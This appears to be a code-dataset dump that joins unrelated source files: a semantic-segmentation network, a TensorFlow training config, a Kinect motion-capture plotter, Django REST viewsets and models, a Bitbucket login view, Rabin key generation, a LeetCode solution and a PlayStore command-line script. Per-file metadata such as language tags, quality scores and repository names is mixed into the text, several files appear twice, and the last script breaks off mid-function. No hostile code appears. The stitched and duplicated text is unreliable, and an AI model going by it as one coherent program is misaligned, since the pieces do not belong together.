512, self.num_classes, kernel_size=1, stride=1, padding=0, bias=True
)
self.aux_head = nn.Sequential(
nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=1, padding=1),
ModuleHelper.BNReLU(
in_channels, bn_type=self.configer.get("network", "bn_type")
),
nn.Conv2d(
in_channels,
self.num_classes,
kernel_size=1,
stride=1,
padding=0,
bias=True,
),
)
self.local_attn = LocalAttention(
in_channels=512,
embed_dim=256,
down_factor=[8, 8],
rpe=False,
norm_layer=ModuleHelper.BatchNorm2d(
bn_type=self.configer.get("network", "bn_type")
),
)
def forward(self, x_):
x = self.backbone(x_)
_, _, h, w = x[0].size()
feat1 = x[0]
feat2 = F.interpolate(x[1], size=(h, w), mode="bilinear", align_corners=True)
feat3 = F.interpolate(x[2], size=(h, w), mode="bilinear", align_corners=True)
feat4 = F.interpolate(x[3], size=(h, w), mode="bilinear", align_corners=True)
feats = torch.cat([feat1, feat2, feat3, feat4], 1)
out_aux = self.aux_head(feats)
feats = self.conv3x3(feats)
# pre- local attention
feats = self.local_attn(feats)
context = self.ocr_gather_head(feats, out_aux)
feats = self.ocr_distri_head(feats, context)
out = self.cls_head(feats)
out_aux = F.interpolate(
out_aux, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
)
out = F.interpolate(
out, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
)
return out_aux, out
def _no_grad_trunc_normal_(tensor, mean, std, a, b):
# Cut & paste from PyTorch official master until it's in a few official releases - RW
# Method based on https://people.sc.fsu.edu/~jburkardt/presentations/truncated_normal.pdf
def norm_cdf(x):
# Computes standard normal cumulative distribution function
return (1.0 + math.erf(x / math.sqrt(2.0))) / 2.0
if (mean < a - 2 * std) or (mean > b + 2 * std):
warnings.warn(
"mean is more than 2 std from [a, b] in nn.init.trunc_normal_. "
"The distribution of values may be incorrect.",
stacklevel=2,
)
with torch.no_grad():
# Values are generated by using a truncated uniform distribution and
# then using the inverse CDF for the normal distribution.
# Get upper and lower cdf values
l = norm_cdf((a - mean) / std)
u = norm_cdf((b - mean) / std)
# Uniformly fill tensor with values from [l, u], then translate to
# [2l-1, 2u-1].
tensor.uniform_(2 * l - 1, 2 * u - 1)
# Use inverse cdf transform for normal distribution to get truncated
# standard normal
tensor.erfinv_()
# Transform to proper mean, std
tensor.mul_(std * math.sqrt(2.0))
tensor.add_(mean)
# Clamp to ensure it's in the proper range
tensor.clamp_(min=a, max=b)
return tensor
def trunc_normal_(tensor, mean=0.0, std=1.0, a=-2.0, b=2.0):
return _no_grad_trunc_normal_(tensor, mean, std, a, b)
class HRNet_W48_SegTREmbedding(nn.Module):
def __init__(self, configer):
super(HRNet_W48_SegTREmbedding, self).__init__()
self.configer = configer
self.num_classes = self.configer.get("data", "num_classes")
self.backbone = BackboneSelector(configer).get_backbone()
in_channels = 720
ocr_mid_channels = 512
ocr_key_channels = 256
self.conv3x3 = nn.Sequential(
nn.Conv2d(
in_channels, ocr_mid_channels, kernel_size=3, stride=1, padding=1
),
ModuleHelper.BNReLU(
ocr_mid_channels, bn_type=self.configer.get("network", "bn_type")
),
)
from lib.models.modules.spatial_ocr_block import SpatialGather_Module
self.ocr_gather_head = SpatialGather_Module(self.num_classes)
from lib.models.modules.spatial_ocr_block import SpatialOCR_Module
self.ocr_distri_head = SpatialOCR_Module(
in_channels=ocr_mid_channels,
key_channels=ocr_key_channels,
out_channels=ocr_mid_channels,
scale=1,
dropout=0.05,
bn_type=self.configer.get("network", "bn_type"),
)
self.cls_head = nn.Parameter(torch.zeros(1, ocr_mid_channels, self.num_classes))
trunc_normal_(self.cls_head, std=0.02)
# self.cls_head = nn.Conv2d(512, self.num_classes, kernel_size=1, stride=1, padding=0, bias=True)
self.aux_head_proj = nn.Sequential(
nn.Conv2d(in_channels, in_channels, kernel_size=1, stride=1, padding=0),
ModuleHelper.BNReLU(
in_channels, bn_type=self.configer.get("network", "bn_type")
),
)
self.aux_head = nn.Parameter(torch.zeros(1, in_channels, self.num_classes))
# self.business_layer.append(self.aux_head)
trunc_normal_(self.aux_head, std=0.02)
self.local_attn = LocalAttention(
in_channels=ocr_mid_channels,
embed_dim=ocr_key_channels,
down_factor=[8, 8],
rpe=False,
norm_layer=ModuleHelper.BatchNorm2d(
bn_type=self.configer.get("network", "bn_type")
),
)
def forward(self, x_):
x = self.backbone(x_)
b, _, h, w = x[0].size()
feat1 = x[0]
feat2 = F.interpolate(x[1], size=(h, w), mode="bilinear", align_corners=True)
feat3 = F.interpolate(x[2], size=(h, w), mode="bilinear", align_corners=True)
feat4 = F.interpolate(x[3], size=(h, w), mode="bilinear", align_corners=True)
feats = torch.cat([feat1, feat2, feat3, feat4], 1)
aux_feat = self.aux_head_proj(feats)
out_aux = torch.bmm(
self.aux_head.repeat(b, 1, 1).permute(0, 2, 1), aux_feat.flatten(2)
).view(b, -1, h, w)
# out_aux = self.aux_head(feats)
feats = self.conv3x3(feats)
# pre- local attention
feats = self.local_attn(feats)
context = self.ocr_gather_head(feats, out_aux)
feats = self.ocr_distri_head(feats, context)
out = torch.bmm(
self.cls_head.repeat(b, 1, 1).permute(0, 2, 1), feats.flatten(2)
).view(b, -1, h, w)
out_aux = F.interpolate(
out_aux, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
)
out = F.interpolate(
out, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
)
return out_aux, out
| en | 0.757793 | ##+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ## Created by: RainbowSecret ## Microsoft Research ## <EMAIL> ## Copyright (c) 2018 ## ## This source code is licensed under the MIT-style license found in the ## LICENSE file in the root directory of this source tree ##+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ deep high-resolution representation learning for human pose estimation, CVPR2019 # extra added layers # 48 + 96 + 192 + 384 # extra added layers # 48 + 96 + 192 + 384 Considering that the 3x3 convolution on the 4x resolution feature map is expensive,
we can decrease the intermediate channels from 512 to 256 w/o performance loss. # 48 + 96 + 192 + 384 # pre- local attention # Cut & paste from PyTorch official master until it's in a few official releases - RW # Method based on https://people.sc.fsu.edu/~jburkardt/presentations/truncated_normal.pdf # Computes standard normal cumulative distribution function # Values are generated by using a truncated uniform distribution and # then using the inverse CDF for the normal distribution. # Get upper and lower cdf values # Uniformly fill tensor with values from [l, u], then translate to # [2l-1, 2u-1]. # Use inverse cdf transform for normal distribution to get truncated # standard normal # Transform to proper mean, std # Clamp to ensure it's in the proper range # self.cls_head = nn.Conv2d(512, self.num_classes, kernel_size=1, stride=1, padding=0, bias=True) # self.business_layer.append(self.aux_head) # out_aux = self.aux_head(feats) # pre- local attention | 2.094691 | 2 |
scripts/uncertainty_scripts/train_local_latent.py | neuroailab/curiosity_deprecated | 0 | 6617373 | <reponame>neuroailab/curiosity_deprecated
'''
Local test for latent space model training.
'''
import sys
sys.path.append('curiosity')
sys.path.append('tfutils')
import tensorflow as tf
from curiosity.interaction import train
from curiosity.interaction.models import mario_world_model_config
from tfutils import base, optimizer
import numpy as np
NUM_BATCHES_PER_EPOCH = 1e8
STATE_DESC = 'depths1'
params = {
'model_params' : {
'cfg' : {
'world_model' : mario_world_model_config,
'uncertainty_model' : {
'state_shape' : [2, 64, 64, 3],
'action_dim' : 8,
'n_action_samples' : 50,
'encode' : {
'encode_depth' : 5,
'encode' : {
1 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 20}},
2 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 20}},
3 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 20}},
4 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 10}},
5 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 5}},
}
},
'mlp' : {
'hidden_depth' : 2,
'hidden' : {1 : {'num_features' : 20, 'dropout' : .75},
2 : {'num_features' : 1, 'activation' : 'identity'}
}
},
'state_descriptor' : STATE_DESC
},
'seed' : 0
},
},
'optimizer_params' : {
'world_model' : {
'fut_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': tf.train.AdamOptimizer,
'clip': True,
},
'act_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': tf.train.AdamOptimizer,
'clip': True,
}
},
'uncertainty_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': tf.train.AdamOptimizer,
'clip': True,
}
},
'learning_rate_params' : {
'world_model' : {
'act_model' : {
'func': tf.train.exponential_decay,
'learning_rate': 1e-5,
'decay_rate': 1.,
'decay_steps': NUM_BATCHES_PER_EPOCH, # exponential decay each epoch
'staircase': True
},
'fut_model' : {
'func': tf.train.exponential_decay,
'learning_rate': 1e-5,
'decay_rate': 1.,
'decay_steps': NUM_BATCHES_PER_EPOCH, # exponential decay each epoch
'staircase': True
}
},
'uncertainty_model' : {
'func': tf.train.exponential_decay,
'learning_rate': 1e-5,
'decay_rate': 1.,
'decay_steps': NUM_BATCHES_PER_EPOCH, # exponential decay each epoch
'staircase': True
}
},
'data_params' : {
'action_limits' : np.array([1., 1.] + [80. for _ in range(6)]),
'full_info_action' : True
},
'visualize' : True,
'exp_id' : 'test_latent'
}
if __name__ == '__main__':
train.train_local(**params)
| '''
Local test for latent space model training.
'''
import sys
sys.path.append('curiosity')
sys.path.append('tfutils')
import tensorflow as tf
from curiosity.interaction import train
from curiosity.interaction.models import mario_world_model_config
from tfutils import base, optimizer
import numpy as np
NUM_BATCHES_PER_EPOCH = 1e8
STATE_DESC = 'depths1'
params = {
'model_params' : {
'cfg' : {
'world_model' : mario_world_model_config,
'uncertainty_model' : {
'state_shape' : [2, 64, 64, 3],
'action_dim' : 8,
'n_action_samples' : 50,
'encode' : {
'encode_depth' : 5,
'encode' : {
1 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 20}},
2 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 20}},
3 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 20}},
4 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 10}},
5 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 5}},
}
},
'mlp' : {
'hidden_depth' : 2,
'hidden' : {1 : {'num_features' : 20, 'dropout' : .75},
2 : {'num_features' : 1, 'activation' : 'identity'}
}
},
'state_descriptor' : STATE_DESC
},
'seed' : 0
},
},
'optimizer_params' : {
'world_model' : {
'fut_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': tf.train.AdamOptimizer,
'clip': True,
},
'act_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': tf.train.AdamOptimizer,
'clip': True,
}
},
'uncertainty_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': tf.train.AdamOptimizer,
'clip': True,
}
},
'learning_rate_params' : {
'world_model' : {
'act_model' : {
'func': tf.train.exponential_decay,
'learning_rate': 1e-5,
'decay_rate': 1.,
'decay_steps': NUM_BATCHES_PER_EPOCH, # exponential decay each epoch
'staircase': True
},
'fut_model' : {
'func': tf.train.exponential_decay,
'learning_rate': 1e-5,
'decay_rate': 1.,
'decay_steps': NUM_BATCHES_PER_EPOCH, # exponential decay each epoch
'staircase': True
}
},
'uncertainty_model' : {
'func': tf.train.exponential_decay,
'learning_rate': 1e-5,
'decay_rate': 1.,
'decay_steps': NUM_BATCHES_PER_EPOCH, # exponential decay each epoch
'staircase': True
}
},
'data_params' : {
'action_limits' : np.array([1., 1.] + [80. for _ in range(6)]),
'full_info_action' : True
},
'visualize' : True,
'exp_id' : 'test_latent'
}
if __name__ == '__main__':
train.train_local(**params) | en | 0.673614 | Local test for latent space model training. # exponential decay each epoch # exponential decay each epoch # exponential decay each epoch | 2.221317 | 2 |
Data_Conversion/animation.py | simay1224/K-project-UI | 0 | 6617374 | # -*- coding: utf-8 -*-
"""
Created on Fri Dec 02 13:04:16 2016
@author: liuqi
"""
JointType_SpineBase = 0
JointType_SpineMid = 1
JointType_Neck = 2
JointType_Head = 3
JointType_ShoulderLeft = 4
JointType_ElbowLeft = 5
JointType_WristLeft = 6
JointType_HandLeft = 7
JointType_ShoulderRight = 8
JointType_ElbowRight = 9
JointType_WristRight = 10
JointType_HandRight = 11
JointType_HipLeft = 12
JointType_KneeLeft = 13
JointType_AnkleLeft = 14
JointType_FootLeft = 15
JointType_HipRight = 16
JointType_KneeRight = 17
JointType_AnkleRight = 18
JointType_FootRight = 19
JointType_SpineShoulder = 20
JointType_HandTipLeft = 21
JointType_ThumbLeft = 22
JointType_HandTipRight = 23
JointType_ThumbRight = 24
import cPickle as pk
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
############################
# Motion capture
###########################
src_path_M = 'E:/Kinect_gaussian_5to7/Unified_M_data/ex6/'
src_path_K = 'E:/Kinect_gaussian_5to7/Unified_K_data/ex6/'
m_data_path = 'Qingyuan_2017-03-06 01.43.26 PM_ex6_FPS30_motion_unified'+'.pkl'
k_data_path = 'Qingyuan_data20170306134320_unified_ex6'+'.pkl'
data_all = pk.load(file(src_path_M+m_data_path))
kdata_all = pk.load(file(src_path_K+k_data_path))
NUM_LABELS = len(data_all) # total number of the joints
NUM_FRAMES = len(data_all[0][1]) # total number of the frames
kNUM_FRAMES = len(kdata_all[0][1])
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.set_xlim(-500,300)
ax.set_ylim(-1000,400)
ax.set_zlim(50,600)
ax.set_xlabel('Z axis')
ax.set_ylabel('X axis')
ax.set_zlabel('Y axis')
xs = []
ys = []
zs = []
kxs = []
kys = []
kzs = []
for joint_idx in data_all.keys() :
xs.append(0)
ys.append(0)
zs.append(0)
kxs.append(0)
kys.append(0)
kzs.append(0)
l_M, = ax.plot(xs,ys,zs, marker='o', linestyle='None', color='r',label='MoCam Joints')
l_K, = ax.plot(kxs,kys,kzs, marker='o', linestyle='None', color='b',label='Kinect Joints')
ax.legend( loc=1)
plt.draw()
for frame_no in xrange(min(kNUM_FRAMES,NUM_FRAMES)):
xs = []
ys = []
zs = []
kxs = []
kys = []
kzs = []
for joint_idx in data_all.keys() :
xs.append(data_all[joint_idx][0][frame_no])
ys.append(data_all[joint_idx][1][frame_no])
zs.append(data_all[joint_idx][2][frame_no])
kxs.append(kdata_all[joint_idx][0][frame_no]-500)
kys.append(kdata_all[joint_idx][1][frame_no])
kzs.append(kdata_all[joint_idx][2][frame_no])
l_M.set_data(xs,zs)
l_M.set_3d_properties(ys)
l_K.set_data(kxs,kzs)
l_K.set_3d_properties(kys)
plt.pause(0.0001) | # -*- coding: utf-8 -*-
"""
Created on Fri Dec 02 13:04:16 2016
@author: liuqi
"""
JointType_SpineBase = 0
JointType_SpineMid = 1
JointType_Neck = 2
JointType_Head = 3
JointType_ShoulderLeft = 4
JointType_ElbowLeft = 5
JointType_WristLeft = 6
JointType_HandLeft = 7
JointType_ShoulderRight = 8
JointType_ElbowRight = 9
JointType_WristRight = 10
JointType_HandRight = 11
JointType_HipLeft = 12
JointType_KneeLeft = 13
JointType_AnkleLeft = 14
JointType_FootLeft = 15
JointType_HipRight = 16
JointType_KneeRight = 17
JointType_AnkleRight = 18
JointType_FootRight = 19
JointType_SpineShoulder = 20
JointType_HandTipLeft = 21
JointType_ThumbLeft = 22
JointType_HandTipRight = 23
JointType_ThumbRight = 24
import cPickle as pk
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
############################
# Motion capture
###########################
src_path_M = 'E:/Kinect_gaussian_5to7/Unified_M_data/ex6/'
src_path_K = 'E:/Kinect_gaussian_5to7/Unified_K_data/ex6/'
m_data_path = 'Qingyuan_2017-03-06 01.43.26 PM_ex6_FPS30_motion_unified'+'.pkl'
k_data_path = 'Qingyuan_data20170306134320_unified_ex6'+'.pkl'
data_all = pk.load(file(src_path_M+m_data_path))
kdata_all = pk.load(file(src_path_K+k_data_path))
NUM_LABELS = len(data_all) # total number of the joints
NUM_FRAMES = len(data_all[0][1]) # total number of the frames
kNUM_FRAMES = len(kdata_all[0][1])
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.set_xlim(-500,300)
ax.set_ylim(-1000,400)
ax.set_zlim(50,600)
ax.set_xlabel('Z axis')
ax.set_ylabel('X axis')
ax.set_zlabel('Y axis')
xs = []
ys = []
zs = []
kxs = []
kys = []
kzs = []
for joint_idx in data_all.keys() :
xs.append(0)
ys.append(0)
zs.append(0)
kxs.append(0)
kys.append(0)
kzs.append(0)
l_M, = ax.plot(xs,ys,zs, marker='o', linestyle='None', color='r',label='MoCam Joints')
l_K, = ax.plot(kxs,kys,kzs, marker='o', linestyle='None', color='b',label='Kinect Joints')
ax.legend( loc=1)
plt.draw()
for frame_no in xrange(min(kNUM_FRAMES,NUM_FRAMES)):
xs = []
ys = []
zs = []
kxs = []
kys = []
kzs = []
for joint_idx in data_all.keys() :
xs.append(data_all[joint_idx][0][frame_no])
ys.append(data_all[joint_idx][1][frame_no])
zs.append(data_all[joint_idx][2][frame_no])
kxs.append(kdata_all[joint_idx][0][frame_no]-500)
kys.append(kdata_all[joint_idx][1][frame_no])
kzs.append(kdata_all[joint_idx][2][frame_no])
l_M.set_data(xs,zs)
l_M.set_3d_properties(ys)
l_K.set_data(kxs,kzs)
l_K.set_3d_properties(kys)
plt.pause(0.0001) | en | 0.369231 | # -*- coding: utf-8 -*- Created on Fri Dec 02 13:04:16 2016 @author: liuqi ############################ # Motion capture ########################### # total number of the joints # total number of the frames | 1.46261 | 1 |
app/api/views.py | nikhiljohn10/django-api-template | 0 | 6617375 | from rest_framework import viewsets
from api.serializers import ManufacturerSerializer, CarSerializer, OwnershipSerializer, OwnerSerializer
from api.models import Manufacturer, Car, Ownership, Owner
class ManufacturerViewSet(viewsets.ModelViewSet):
queryset = Manufacturer.objects.all()
serializer_class = ManufacturerSerializer
class CarViewSet(viewsets.ModelViewSet):
queryset = Car.objects.all()
serializer_class = CarSerializer
class OwnershipViewSet(viewsets.ModelViewSet):
queryset = Ownership.objects.all()
serializer_class = OwnershipSerializer
class OwnerViewSet(viewsets.ModelViewSet):
queryset = Owner.objects.all()
serializer_class = OwnerSerializer
| from rest_framework import viewsets
from api.serializers import ManufacturerSerializer, CarSerializer, OwnershipSerializer, OwnerSerializer
from api.models import Manufacturer, Car, Ownership, Owner
class ManufacturerViewSet(viewsets.ModelViewSet):
queryset = Manufacturer.objects.all()
serializer_class = ManufacturerSerializer
class CarViewSet(viewsets.ModelViewSet):
queryset = Car.objects.all()
serializer_class = CarSerializer
class OwnershipViewSet(viewsets.ModelViewSet):
queryset = Ownership.objects.all()
serializer_class = OwnershipSerializer
class OwnerViewSet(viewsets.ModelViewSet):
queryset = Owner.objects.all()
serializer_class = OwnerSerializer
| none | 1 | 2.144288 | 2 | |
src/sentry/identity/bitbucket/provider.py | AlexWayfer/sentry | 4 | 6617376 | <filename>src/sentry/identity/bitbucket/provider.py
from __future__ import absolute_import
from sentry.pipeline import PipelineView
from sentry.utils.http import absolute_uri
from sentry.identity.base import Provider
class BitbucketIdentityProvider(Provider):
key = 'bitbucket'
name = 'Bitbucket'
def get_pipeline_views(self):
return [BitbucketLoginView()]
class BitbucketLoginView(PipelineView):
def dispatch(self, request, pipeline):
jwt = request.GET.get('jwt')
if jwt is None:
return self.redirect(
'https://bitbucket.org/site/addons/authorize?descriptor_uri=%s' % (
absolute_uri('/extensions/bitbucket/descriptor/'),
))
return pipeline.next_step()
| <filename>src/sentry/identity/bitbucket/provider.py
from __future__ import absolute_import
from sentry.pipeline import PipelineView
from sentry.utils.http import absolute_uri
from sentry.identity.base import Provider
class BitbucketIdentityProvider(Provider):
key = 'bitbucket'
name = 'Bitbucket'
def get_pipeline_views(self):
return [BitbucketLoginView()]
class BitbucketLoginView(PipelineView):
def dispatch(self, request, pipeline):
jwt = request.GET.get('jwt')
if jwt is None:
return self.redirect(
'https://bitbucket.org/site/addons/authorize?descriptor_uri=%s' % (
absolute_uri('/extensions/bitbucket/descriptor/'),
))
return pipeline.next_step()
| none | 1 | 2.099218 | 2 | |
rabin/prime.py | LukasForst/rabin-crypto | 0 | 6617377 | from typing import Tuple
import Crypto.Util.number as number
from rabin.crypto_configuration import PRIME_LENGTH_BITS
from rabin.dto import RabinCryptoKey, RabinSecretKey, RabinPublicKey
def euklids_algorithm(a: int, b: int) -> Tuple[int, int, int]:
"""
Euklids algorithm returning GCD = X*a + Y*b.
>>> a, b = 3, 13
>>> gcd, ax, by = euklids_algorithm(a, b)
>>> gcd == ax*a + by*b
True
"""
if a == 0:
return b, 0, 1
gcd, x1, y1 = euklids_algorithm(b % a, a)
x = y1 - (b // a) * x1
y = x1
return gcd, x, y
def generate_rabin_key(bit_len: int = PRIME_LENGTH_BITS) -> RabinCryptoKey:
"""
Securely generate whole key material for Rabin cryptosystem.
"""
p, q = _get_private_key_prime(bit_len), _get_private_key_prime(bit_len)
return RabinCryptoKey(
private=RabinSecretKey(p=p, q=q),
public=RabinPublicKey(n=p * q)
)
def _get_private_key_prime(bit_len: int) -> int:
while True:
# cryptographically secure way how to generate prime number
# internally it uses urandom, which is suitable for cryptographic use
p = number.getPrime(bit_len)
if p % 4 == 3:
return p
| from typing import Tuple
import Crypto.Util.number as number
from rabin.crypto_configuration import PRIME_LENGTH_BITS
from rabin.dto import RabinCryptoKey, RabinSecretKey, RabinPublicKey
def euklids_algorithm(a: int, b: int) -> Tuple[int, int, int]:
"""
Euklids algorithm returning GCD = X*a + Y*b.
>>> a, b = 3, 13
>>> gcd, ax, by = euklids_algorithm(a, b)
>>> gcd == ax*a + by*b
True
"""
if a == 0:
return b, 0, 1
gcd, x1, y1 = euklids_algorithm(b % a, a)
x = y1 - (b // a) * x1
y = x1
return gcd, x, y
def generate_rabin_key(bit_len: int = PRIME_LENGTH_BITS) -> RabinCryptoKey:
"""
Securely generate whole key material for Rabin cryptosystem.
"""
p, q = _get_private_key_prime(bit_len), _get_private_key_prime(bit_len)
return RabinCryptoKey(
private=RabinSecretKey(p=p, q=q),
public=RabinPublicKey(n=p * q)
)
def _get_private_key_prime(bit_len: int) -> int:
while True:
# cryptographically secure way how to generate prime number
# internally it uses urandom, which is suitable for cryptographic use
p = number.getPrime(bit_len)
if p % 4 == 3:
return p
| en | 0.736576 | Euklids algorithm returning GCD = X*a + Y*b. >>> a, b = 3, 13 >>> gcd, ax, by = euklids_algorithm(a, b) >>> gcd == ax*a + by*b True Securely generate whole key material for Rabin cryptosystem. # cryptographically secure way how to generate prime number # internally it uses urandom, which is suitable for cryptographic use | 3.466294 | 3 |
leetcode/python/easy/p788_rotatedDigits.py | kefirzhang/algorithms | 0 | 6617378 | class Solution:
def rotatedDigits(self, N: int) -> int:
# 1-》 2 5 6 9 0 -》 0 1 8 -1 3 4 7
helper = [0, 0, 1, -1, -1, 1, 1, -1, 0, 1]
total = 0
for i in range(1, N + 1):
i = str(i)
if len(i) <= 1:
if helper[int(i)] == 1:
total += 1
print(i)
else:
left = int(i[:-1])
right = int(i[-1])
if helper[left] == -1 or helper[right] == -1:
helper.append(-1)
elif helper[left] == 0 and helper[right] == 0:
helper.append(0)
else:
helper.append(1)
total += 1
# print(i)
return total
slu = Solution()
print(slu.rotatedDigits(100))
| class Solution:
def rotatedDigits(self, N: int) -> int:
# 1-》 2 5 6 9 0 -》 0 1 8 -1 3 4 7
helper = [0, 0, 1, -1, -1, 1, 1, -1, 0, 1]
total = 0
for i in range(1, N + 1):
i = str(i)
if len(i) <= 1:
if helper[int(i)] == 1:
total += 1
print(i)
else:
left = int(i[:-1])
right = int(i[-1])
if helper[left] == -1 or helper[right] == -1:
helper.append(-1)
elif helper[left] == 0 and helper[right] == 0:
helper.append(0)
else:
helper.append(1)
total += 1
# print(i)
return total
slu = Solution()
print(slu.rotatedDigits(100))
| zh | 0.653068 | # 1-》 2 5 6 9 0 -》 0 1 8 -1 3 4 7 # print(i) | 3.155795 | 3 |
domain/arrive_info.py | kex5n/Vehicles-Dispatch-Simulator | 0 | 6617379 | <filename>domain/arrive_info.py
from enum import Enum
# random.seed(1234)
# np.random.seed(1234)
# torch.manual_seed(1234)
# torch.cuda.manual_seed_all(1234)
# torch.backends.cudnn.deterministic = True
class ArriveInfo(Enum):
REJECT = "Reject"
SUCCESS = "Success"
| <filename>domain/arrive_info.py
from enum import Enum
# random.seed(1234)
# np.random.seed(1234)
# torch.manual_seed(1234)
# torch.cuda.manual_seed_all(1234)
# torch.backends.cudnn.deterministic = True
class ArriveInfo(Enum):
REJECT = "Reject"
SUCCESS = "Success"
| en | 0.180819 | # random.seed(1234) # np.random.seed(1234) # torch.manual_seed(1234) # torch.cuda.manual_seed_all(1234) # torch.backends.cudnn.deterministic = True | 2.022767 | 2 |
04_Django/Django_db/Relation_db/models.py | DajuanM/DHPythonDemo | 0 | 6617380 | <gh_stars>0
from django.db import models
# Create your models here.
class School(models.Model):
school_id = models.IntegerField()
school_name = models.CharField(max_length=20)
#manager = models.OneToOneField(Manager)
def __str__(self):
return self.school_name
class Manager(models.Model):
manager_id = models.IntegerField()
manager_name = models.CharField(max_length=20)
my_school = models.OneToOneField(School)
def __str__(self):
return self.manager_name | from django.db import models
# Create your models here.
class School(models.Model):
school_id = models.IntegerField()
school_name = models.CharField(max_length=20)
#manager = models.OneToOneField(Manager)
def __str__(self):
return self.school_name
class Manager(models.Model):
manager_id = models.IntegerField()
manager_name = models.CharField(max_length=20)
my_school = models.OneToOneField(School)
def __str__(self):
return self.manager_name | en | 0.872256 | # Create your models here. #manager = models.OneToOneField(Manager) | 2.668559 | 3 |
ronpy/__init__.py | rhsmits91/ronpy | 0 | 6617381 | from . import decorators
from . import logger
__version__ = '0.0.1'
def get_version():
return __version__
| from . import decorators
from . import logger
__version__ = '0.0.1'
def get_version():
return __version__
| none | 1 | 1.734751 | 2 | |
user.py | Niraj-Kamdar/PlayStore-Database | 0 | 6617382 | from __future__ import print_function, unicode_literals
import itertools
import sys
from clint.textui import colored, indent, puts
from pyfiglet import figlet_format as figlet
from PyInquirer import Separator, Token, prompt, style_from_dict
from playstore import PlayStore
def convert(val, ans):
if "int" in val:
return int(ans)
elif "numeric" in val:
return float(ans)
elif "bool" == val:
return True if ans == "true" else False
else:
return ans
db = PlayStore()
puts(colored.green(figlet("PlayStore")))
style = style_from_dict(
{
Token.Separator: "#<PASSWORD>",
Token.QuestionMark: "#<PASSWORD>",
Token.Selected: "#<PASSWORD>", # default
Token.Pointer: "#<PASSWORD> bold",
Token.Instruction: "#<PASSWORD>", # default
Token.Answer: "#<PASSWORD> bold",
Token.Question: "#<PASSWORD>",
}
)
q1 = [
{
"type": "input",
"message": "Enter your userid (email)",
"name": "userid",
"validate": lambda text: len(text) != 0 or "Enter a valid userid",
},
{
"type": "list",
"message": "Select option",
"name": "product",
"choices": [{"name": "App"}, {"name": "Book"}, {"name": "Account"}],
"validate": lambda answer: "You must choose a product."
if len(answer) == 0
else True,
},
]
a1 = prompt(q1, style=style)
if a1["product"] == "App":
q2 = [
{
"type": "list",
"message": "Select option",
"name": "option",
"choices": [{"name": "Install"}, {"name": "Update"}, {"name": "Uninstall"}, {"name": "Wishlist"}],
"validate": lambda answer: "You must choose at least one option."
if len(answer) == 0
else True,
}
]
q3 = [
{
"type": "list",
"message": "Select option",
"name": "option",
"choices": [
{"name": "previously installed apps"},
{"name": "wishlisted apps"},
{"name": "trending apps"},
{"name": "best rated apps"},
{"name": "category wise apps"},
{"name": "search apps"},
],
"validate": lambda answer: "You must choose at least one option."
if len(answer) == 0
else True,
}
]
q4 = [
{
"type": "checkbox",
"message": "Select app you want to install",
"name": "install",
"choices": [],
}
]
q5 = [
{
"type": "checkbox",
"message": "Select category from which you want to install app",
"name": "category",
"choices": [],
}
]
q6 = [
{
"type": "confirm",
"name": "buy",
"message": "Do you want to buy the app?",
"default": False,
}
]
q7 = [
{
"type": "list",
"message": "Select payment method",
"name": "payment",
"choices": [],
"validate": lambda answer: "You must choose at least one option."
if len(answer) == 0
else True,
}
]
q8 = [
{
"type": "list",
"message": "Enter rating",
"name": "rating",
"choices": [1, 2, 3, 4, 5],
},
{
"type": "input",
"message": "Give Review",
"name": "comment",
}
]
dcommand = {"Uninstall": False, "Update": True, "Feedback": True}
a2 = prompt(q2, style=style)
if a2["option"] == "Install":
a3 = prompt(q3, style=style)
if a3["option"] == "previously installed apps":
apps = db.downloaded_app(a1["userid"], False, False)
apps = dict(apps)
if apps == {}:
puts(
colored.red(
"You don't have any app in previously installed apps!"
)
)
sys.exit()
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
elif a3["option"] == "wishlisted apps":
apps = db.get_wishlist(a1["userid"], True, False)
apps = dict(apps)
if apps == {}:
puts(
colored.red(
"You don't have any app in wishlisted apps!"
)
)
sys.exit()
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
elif a3["option"] == "trending apps":
apps = db.trending(True, False)
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
elif a3["option"] == "best rated apps":
apps = db.best_rated(True, False)
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
elif a3["option"] == "category wise apps":
cats = db.get_category()
for i in itertools.chain.from_iterable(cats):
q5[0]["choices"].append({"name": i})
a5 = prompt(q5, style=style)
for i in a5["category"]:
apps = db.category_wise(i, False)
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
else:
q9 = [
{
"type": "input",
"message": "Enter name of the app",
"name": "search",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
a9 = prompt(q9, style=style)
